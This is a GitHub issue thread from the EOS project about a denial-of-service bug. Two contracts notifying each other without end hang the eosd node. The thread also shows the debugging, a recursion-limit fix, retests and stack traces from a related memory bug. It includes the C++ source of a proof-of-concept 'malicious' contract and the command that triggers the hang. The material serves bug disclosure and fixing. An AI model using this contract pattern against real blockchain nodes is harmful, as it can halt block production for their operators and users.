Skip to content
This repository has been archived by the owner on Aug 2, 2022. It is now read-only.

DAWN-167 ⁃ eosd dies when there is infinite notifications between two contracts #704

Closed
blockone-syncclient opened this issue Nov 15, 2017 · 27 comments
Assignees
Milestone

Comments

@blockone-syncclient
Copy link

blockone-syncclient commented Nov 15, 2017

I have developed two contracts to simulate this scenario:

  1. Malicious contract sends a message to dummy contract as follows:
./eosc push message malicious notify  '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy

The source code is as follows:

void apply_malicious_notify(const TOKEN_NAME::transfer &transfer_msg) {
        eosio::print("From malicious::apply_malicious_notiofy\nGoing to message to ");
        eosio::print(transfer_msg.to);
        eosio::print("\n");
        require_notice(transfer_msg.to);
    }  // namespace TOKEN_NAME

    using namespace TOKEN_NAME;

    extern "C"
    {
    void init() {
        store_account(N(malicious), account(malicious_tokens(1000ll * 1000ll * 1000ll)));
    }

    /// The apply method implements the dispatch of events to this contract
    void apply(uint64_t code, uint64_t action) {
        eosio::print("From malicious::apply\n");
        if (code == N(malicious)) {
            if (action == N(resource))
                TOKEN_NAME::apply_malicious_resource();
            else if (action == N(infinite))
                TOKEN_NAME::apply_malicious_infinite();
            else if (action == N(math))
                TOKEN_NAME::apply_malicious_math();
            else if (action == N(notify))
                TOKEN_NAME::apply_malicious_notify(current_message<TOKEN_NAME::transfer>());
        }
        else if (code == N(dummy)) {
           if (action == N(notify))
                TOKEN_NAME::apply_malicious_notify(current_message<TOKEN_NAME::transfer>());
        }
    }
    }
  1. Now the dummy contract receive it and transfer it back to both itself and Malicious contract:
void apply_dummy_notify(const TOKEN_NAME::transfer &transfer_msg) {
        eosio::print("From dummy::apply_dummy_notiofy\n\n");
        require_notice(transfer_msg.from);
        require_notice(transfer_msg.to);
    }  // namespace TOKEN_NAME

    using namespace TOKEN_NAME;

    extern "C"
    {
    void init() {
        store_account(N(dummy), account(dummy_tokens(1000ll * 1000ll * 1000ll)));
    }

    /// The apply method implements the dispatch of events to this contract
    void apply(uint64_t code, uint64_t action) {

        if (code == N(malicious)) {
            eosio::print("From dummy::apply\n");
            if (action == N(notify))
                TOKEN_NAME::apply_dummy_notify(current_message<TOKEN_NAME::transfer>());
        }
    }

When the transaction happens, eosd will stop responding and wont be able to generate blocks anymore.

┆Attachments: CMakeLists.txt | CMakeLists (4643a848-7a02-44bd-8214-f2d1f6d6c6d8).txt | dummy.abi | dummy.cpp | dummy.hpp | malicious.abi | malicious.cpp | malicious.hpp

@blockone-syncclient
Copy link
Author

➤ Brian Johnson commented:

(Comment removed, misunderstood the test scenario)

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

Let me simplify the scenario. Contracts A and B are talking to each other.
A sends msg to B
B receives it, sends message back to A and B (ie to himself).
When I introduce the code in B to send msg to himself, things become nasty.

For the next 3 seconds, B receives plenty of messages. After that, seems during the 3 seconds context switch eosd becomes unresponsive and no more block generation

@blockone-syncclient
Copy link
Author

➤ Brian Johnson commented:

void chain_controller::process_message(const Transaction& trx, AccountName code,
const Message& message, MessageOutput& output, apply_context* parent_context) {
apply_context apply_ctx(*this, _db, trx, message, code);
apply_message(apply_ctx);

output.notify.reserve( apply_ctx.notified.size() );

for( uint32_t i = 0; i < apply_ctx.notified.size(); ++i ) {
try {
auto notify_code = apply_ctx.notified[i];
output.notify.push_back( {notify_code} );
process_message(trx, notify_code, message, output.notify.back().output, &apply_ctx);
} FC_CAPTURE_AND_RETHROW((apply_ctx.notified[i]))
}
...
}means that each recursive call to process_message gets a new apply_context, which means that there is a new apply_ctx.notified list, so they will just keep notifying back and forth.

And the code in here will never matter since notified is not carried into the next context:

void apply_context::require_recipient(const types::AccountName& account) {
if (account == msg.code)
return;

auto itr = boost::find_if(notified, [&account](const auto& recipient) {
return recipient == account;
});

if (itr == notified.end()) {
notified.push_back(account);
}
}

@blockone-syncclient
Copy link
Author

➤ Brian Johnson commented:

Depending on what the use cases we need to accommodate, there could be several solutions to limit this. Easiest one I can think of is imposing a total transaction time limit (right now we have a transaction message time limit).

With the limited time to release, I would like input from [~dan.larimer] and [~admin]

@blockone-syncclient
Copy link
Author

➤ David Moss commented:

[~brian.johnson] Agreed. Please proceed with imposing a total transaction time limit.

@blockone-syncclient
Copy link
Author

➤ Jonathan Giszczak commented:

There is an existing recursion limit for transactions of 4. This is a fundamental aspect of the blockchain, encoded in the genesis block. There is no similar limit for messages. Should we impose the same limit on message recursion or a different limit?

@blockone-syncclient
Copy link
Author

➤ Christian Dunst commented:

I brought this up in a casual conversation and I believe that the solution from Dan was to impose a total limit.

If we don't do this, we could easily write a cascading contract which will bring the bc down.

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

@christian Dunst, I already wrote a "malicious" contract for the same purpose and it could bring eosd down.

@blockone-syncclient
Copy link
Author

➤ Jonathan Giszczak commented:

[~dhanesh.balakrishnan] Please attach buildable versions of the contracts. I have a possible fix, but need to test it.

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

Attaching two contracts herewith

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

How to test each test cases:
./eosc push message malicious resource '{"from":"malicious","to":"inita","amount":50}' --scope malicious,inita
./eosc push message malicious infinite '{"from":"malicious","to":"inita","amount":50}' --scope malicious,inita
./eosc push message malicious math '{}' --scope malicious,inita

// the following one simulates endless transaction msgs
./eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

Works well in the latest build. Here is the test result:
bash-3.2$ ./eosc version client
Build version: 66d23b8
bash-3.2$

bash-3.2$ ./eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy
3584736ms thread-0 main.cpp:1050 operator() ] Converting argument to binary...
{
"transaction_id": "6fa84c4783f13188f8ff76460f83557a5e627be98e2342e005fb19ca4879f829",
"processed": {
"ref_block_num": 932,
"ref_block_prefix": 3374380092,
"expiration": "2017-11-22T09:00:14",
"scope": [
"dummy",
"malicious"
],
"signatures": [],
"messages": [{
"code": "malicious",
"type": "notify",
"authorization": [],
"data": ""
}
],
"output": [{
"notify": [],
"deferred_trxs": []
}
]
}
}
bash-3.2$

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

Please get this contract into github and integrated into eosd_run_test.sh so it is run on every commit.

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

Works as expected

bash-3.2$ eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy
3021720ms thread-0 main.cpp:1050 operator() ] Converting argument to binary...
3023100ms thread-0 main.cpp:1117 main ] Failed with error: 10 assert_exception: Assert Exception
status_code == 200: Error code 400
: {"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}

{"c":400,"msg":"{"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}"}
thread-0 httpc.cpp:113 call

{"server":"10.160.11.221","port":8888,"path":"/v1/chain/push_transaction","postdata":{"ref_block_num":2805,"ref_block_prefix":2023605566,"expiration":"2017-11-23T08:50:51","scope":["dummy","malicious"],"read_scope":[],"messages":[{"code":"malicious","type":"notify","authorization":[],"data":"0000c09a3ae4a29100000000002fa54e3200000000000000"}],"signatures":[]}}
thread-0 httpc.cpp:117 call

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

I am not sure whether it is due to malicious contract, but node 0 stopped responding after executing the malicious contract's ping pong messaging between malicious and dummy contracts:

The last update at eosd is:
testnet@ip-10-160-11-221:~/STAT/build/tn_data_00$ tail -f stderr.txt
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From malicious::apply(code=malicious)
malicious::apply_malicious_notiofy from : malicious to : dummy
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
3041752ms thread-0 chain_controller.cpp:208 pushblock ] inita #2806 @2017-11-23T08:50:42 | 0 trx, 0 pending, exectime_ms=0
3041752ms thread-0 producer_plugin.cpp:244 block_production_loo ] inita generated block #2806 @ 2017-11-23T08:50:42 with 0 trxs 0 pending
3043084ms thread-0 net_plugin.cpp:558 ~connection ] released connection from client

Log is kept at /home/testnet/STAT/build/tn_data_00/stderr.txt.STAT-167
testnet@ip-10-160-11-221:~/STAT/build/tn_data_00$ hostname
ip-10-160-11-221

Interestingly the same test works well on testnet node 1

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

Please retest with latest testnet.

@blockone-syncclient
Copy link
Author

➤ Dhanesh Valappil commented:

Specific test passes again:
022467ms thread-0 main.cpp:1125 main ] Failed with error: 10 assert_exception: Assert Exception
status_code == 200: Error code 400
: {"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}

{"c":400,"msg":"{"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}"}
thread-0 httpc.cpp:113 call

{"server":"10.160.11.221","port":8888,"path":"/v1/chain/push_transaction","postdata":{"ref_block_num":1300,"ref_block_prefix":3760663211,"expiration":"2017-11-28T02:17:22","scope":["dummy","malicious"],"read_scope":[],"messages":[{"code":"malicious","type":"notify","authorization":[],"data":"0000c09a3ae4a29100000000002fa54e3200000000000000"}],"signatures":[]}}
thread-0 httpc.cpp:117 call
bash-3.2$

But most of the nodes died.
Node 0

From malicious::apply(code=malicious)
malicious::apply_malicious_notiofy from : malicious to : dummy
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
1033003ms thread-0 chain_controller.cpp:208 pushblock ] inita #1301 @2017-11-28T02:17:13 | 0 trx, 0 pending, exectime_ms=0
1033003ms thread-0 producer_plugin.cpp:244 block_production_loo ] inita generated block #1301 @ 2017-11-28T02:17:13 with 0 trxs 0 pending
1044022ms thread-0 net_plugin.cpp:1737 handle_message ] received forking block #1299
1045404ms thread-0 net_plugin.cpp:560 ~connection ] released connection from client
1076836ms thread-0 net_plugin.cpp:554 connection ] accepted network connection
1153162ms thread-0 net_plugin.cpp:554 connection ] accepted network connection
1167054ms thread-0 net_plugin.cpp:1262 operator() ] Error reading message from connection: End of file
1167056ms thread-0 net_plugin.cpp:833 operator() ] Error sending message: Broken pipe
1173995ms thread-0 net_plugin.cpp:560 ~connection ] released connection from client

Node 1
99003ms thread-0 chain_controller.cpp:208 pushblock ] initg #1297 @2017-11-28T02:16:39 | 0 trx, 0 pending, exectime_ms=0
1000003ms thread-0 chain_controller.cpp:208 pushblock ] initl #1298 @2017-11-28T02:16:40 | 0 trx, 0 pending, exectime_ms=0
1005004ms thread-0 chain_controller.cpp:208 pushblock ] initb #1299 @2017-11-28T02:16:45 | 0 trx, 0 pending, exectime_ms=0
1005004ms thread-0 producer_plugin.cpp:244 block_production_loo ] initb generated block #1299 @ 2017-11-28T02:16:45 with 0 trxs 0 pending
1011611ms thread-0 net_plugin.cpp:1737 handle_message ] received forking block #1299
1012009ms thread-0 chain_controller.cpp:144 pushblock ] Switching to fork: 000005147bff31f7ab2a27e056da217ce3b47e89a533533e547c123fa9858e0d
1012009ms thread-0 chain_controller.cpp:153 pushblock ] pushing blocks from fork 1299 00000513ecd99dc35dafb943f03a56f528d999cb4f0edf740b04e6f413082af6
1012010ms thread-0 chain_controller.cpp:153 pushblock ] pushing blocks from fork 1300 000005147bff31f7ab2a27e056da217ce3b47e89a533533e547c123fa9858e0d

@blockone-syncclient
Copy link
Author

➤ Brian Johnson commented:

Just pulling the execution command out to be easier to see(comment window may add return characters):

eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

config.ini additions for testnet:

block-interval-seconds = 5
pending-txn-depth-limit = 50

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

Running a 4 producer mesh network with 1 sec default block time. I ran tests/eosd_run_test.sh and the eosds all pegged the cpu and spiked memory usage. I was able to connect to the eosd and got this stack trace:

(gdb) where
#0 0x00007fb394d343c0 in __libc_recvmsg (fd=15, msg=0x7ffd86ebb490, flags=0) at ../sysdeps/unix/sysv/linux/recvmsg.c:28
#1 0x0000000000bc85ea in boost::asio::detail::socket_ops::recv (s=15, bufs=0x7ffd86ebb508, flags=0, count=, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:784
#2 boost::asio::detail::socket_ops::non_blocking_recv (s=15, bufs=, count=, flags=, is_stream=, ec=..., bytes_transferred=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:873
#3 0x0000000000bc855e in boost::asio::detail::reactive_socket_recv_op_base<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > >::do_perform (base=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:55
#4 0x0000000000af0ffd in boost::asio::detail::reactor_op::perform (this=0x4a58e80) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactor_op.hpp:40
#5 boost::asio::detail::epoll_reactor::start_op (this=0x48a0020, op_type=, descriptor=, descriptor_data=@0x48e4978: 0x4910c00, op=0x4a58e80, is_continuation=,
allow_speculative=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/epoll_reactor.ipp:242
#6 0x0000000000af0d18 in boost::asio::detail::reactive_socket_service_base::start_op (this=0x48e4248, impl=..., op_type=0, op=0x4a58e80, is_continuation=,
is_non_blocking=, noop=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/reactive_socket_service_base.ipp:213
#7 0x0000000000ab95f5 in boost::asio::detail::reactive_socket_service_base::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_service_base::base_implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (flags=0,
this=, impl=..., buffers=..., handler=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_service_base.hpp:287
#8 boost::asio::stream_socket_serviceboost::asio::ip::tcp::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_serviceboost::asio::ip::tcp::implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (flags=0,
this=, impl=..., buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/stream_socket_service.hpp:361
#9 boost::asio::basic_stream_socket<boost::asio::ip::tcp, boost::asio::stream_socket_serviceboost::asio::ip::tcp >::async_read_some<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (this=, buffers=..., handler=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/basic_stream_socket.hpp:844
#10 eosio::net_plugin_impl::start_read_message (this=, conn=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1289
#11 0x0000000000ae2ad9 in eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7::operator()(boost::system::error_code, unsigned long) const (bytes_transferred=, this=, ec=...)
at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1320
#12 boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>::operator()() (this=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/bind_handler.hpp:127
#13 boost::asio::asio_handler_invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long> >(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, ...) (function=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/handler_invoke_hook.hpp:69
#14 boost_asio_handler_invoke_helpers::invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (function=...,
context=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/handler_invoke_helpers.hpp:37
#15 boost::asio::detail::reactive_socket_recv_op<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>::do_complete(boost::asio::detail::task_io_service*, boost::asio::detail::task_io_service_operation*, boost::system::error_code const&, unsigned long) (owner=, base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:110
#16 0x00000000009735e7 in boost::asio::detail::task_io_service_operation::complete (this=, owner=..., ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/task_io_service_operation.hpp:38
#17 boost::asio::detail::task_io_service::do_run_one (this=0x489ec50, lock=..., this_thread=..., ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:372
#18 0x0000000000973201 in boost::asio::detail::task_io_service::run (this=0x489ec50, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:149
#19 0x000000000097176c in boost::asio::io_service::run (this=0x489ebe0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/impl/io_service.ipp:59
#20 appbase::application::exec (this=0x283fa28 appbase::application::instance()::_app) at /home/heifnerk/ext/eos/libraries/appbase/application.cpp:186
#21 0x0000000000969628 in main (argc=4, argv=0x7ffd86ebc158) at /home/heifnerk/ext/eos/programs/eosd/main.cpp:42

@blockone-syncclient
Copy link
Author

➤ Bart Wyatt commented:

That callstack really looks like the message_buffer was destroyed and then the a call to the io_service message pump still wrote to it. Given that the message_buffer is owned by the connection and we have already seen issues where the connection is destroyed while asio calls are outstanding, this doesn't surprise me.

We should probably audit all the lifetimes in that code asap. At the very least, the handler lambda should manage the lifetime of the buffers passed into async_read_some.

The nuclear option is to have the lambda capture a shared_ptr to the connection but as we have no hard guarantees about when that lambda fires it makes the lifetime of our connection object harder for us to track. So, first option is to see if we can get a handle on all the things that may be used outside the lifetime of the connection. We fixed many yesterday, hopefully the message_buffer is part of a short list.

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

With latest from Paul on morning of 11/30/2017.

#0 0x00007fa5077c8377 in __libc_recvmsg (fd=17, msg=0x7ffdece2a470, flags=0) at ../sysdeps/unix/sysv/linux/recvmsg.c:28
#1 0x0000000000ba527a in boost::asio::detail::socket_ops::recv (s=17, bufs=0x7ffdece2a4e8, flags=0, count=, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:784
#2 boost::asio::detail::socket_ops::non_blocking_recv (s=17, bufs=, count=, flags=, is_stream=, ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:873
#3 0x0000000000ba51ee in boost::asio::detail::reactive_socket_recv_op_base<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > >::do_perform (base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:55
#4 0x0000000000acdc8d in boost::asio::detail::reactor_op::perform (this=0x34f9ad0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactor_op.hpp:40
#5 boost::asio::detail::epoll_reactor::start_op (this=0x3310010, op_type=, descriptor=, descriptor_data=@0x334f2e8: 0x335ba70, op=0x34f9ad0, is_continuation=, allow_speculative=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/epoll_reactor.ipp:242
#6 0x0000000000acd9a8 in boost::asio::detail::reactive_socket_service_base::start_op (this=0x334a4f8, impl=..., op_type=0, op=0x34f9ad0, is_continuation=, is_non_blocking=, noop=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/reactive_socket_service_base.ipp:213
#7 0x0000000000a962a5 in boost::asio::detail::reactive_socket_service_base::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_service_base::base_implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (flags=0, this=, impl=..., buffers=..., handler=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_service_base.hpp:287
#8 boost::asio::stream_socket_serviceboost::asio::ip::tcp::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_serviceboost::asio::ip::tcp::implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (flags=0, this=, impl=..., buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/stream_socket_service.hpp:361
#9 boost::asio::basic_stream_socket<boost::asio::ip::tcp, boost::asio::stream_socket_serviceboost::asio::ip::tcp >::async_read_some<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (this=, buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/basic_stream_socket.hpp:844
#10 eosio::net_plugin_impl::start_read_message (this=, conn=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1296
#11 0x0000000000abf769 in eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7::operator()(boost::system::error_code, unsigned long) const (bytes_transferred=, this=, ec=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1327
#12 boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>::operator()() (this=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/bind_handler.hpp:127
#13 boost::asio::asio_handler_invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long> >(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, ...) (function=...)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/handler_invoke_hook.hpp:69
#14 boost_asio_handler_invoke_helpers::invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (function=..., context=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/handler_invoke_helpers.hpp:37
#15 boost::asio::detail::reactive_socket_recv_op<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>::do_complete(boost::asio::detail::task_io_service*, boost::asio::detail::task_io_service_operation*, boost::system::error_code const&, unsigned long) (
owner=, base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:110
#16 0x000000000095f8c7 in boost::asio::detail::task_io_service_operation::complete (this=, owner=..., ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/task_io_service_operation.hpp:38
#17 boost::asio::detail::task_io_service::do_run_one (this=0x330ec40, lock=..., this_thread=..., ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:372
#18 0x000000000095f4e1 in boost::asio::detail::task_io_service::run (this=0x330ec40, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:149
#19 0x000000000095da4c in boost::asio::io_service::run (this=0x330ebd0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/impl/io_service.ipp:59
#20 appbase::application::exec (this=0x280fa28 appbase::application::instance()::_app) at /home/heifnerk/ext/eos/libraries/appbase/application.cpp:186
#21 0x0000000000955908 in main (argc=4, argv=0x7ffdece2b138) at /home/heifnerk/ext/eos/programs/eosd/main.cpp:42

@blockone-syncclient
Copy link
Author

➤ Kevin Heifner commented:

I think we have a fix for the memory corruption issue. Creating PR for it now. Chasing a spam message send now.

@blockone-syncclient
Copy link
Author

➤ Corey Lederer commented:

[~dhanesh.balakrishnan] Can you please re-test with the examples you gave above? We believe this should be fixed.

@blockone-syncclient
Copy link
Author

➤ Corey Lederer commented:

Moving to finished, this was moved to closed-withdrawn by mistake.

@chenlian2015
Copy link

"Your email address chenlian2025@gmail.com doesn't have access to blockone.atlassian.net
We've all got more than one email address these days - are you using the right one?
If you're certain you should have access with chenlian2025@gmail.com, contact your administrator."

could you add access to me ?

@coreylederer
Copy link
Contributor

@chenlian2015: blockone.atlassian.net is a private repository which is not available to the public.

spoonincode referenced this issue Dec 8, 2017
…r-safety

stat 167 gh 704 read buffer safety

(reapplied on noon branch)
heifner added a commit that referenced this issue Jan 4, 2018
heifner added a commit that referenced this issue Jan 4, 2018
(cherry picked from commit f5e316d)
@blockone-syncclient blockone-syncclient changed the title STAT-167 ⁃ eosd dies when there is infinite notifications between two contracts DAWN-167 ⁃ eosd dies when there is infinite notifications between two contracts Jan 16, 2018
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Projects
None yet
Development

No branches or pull requests

6 participants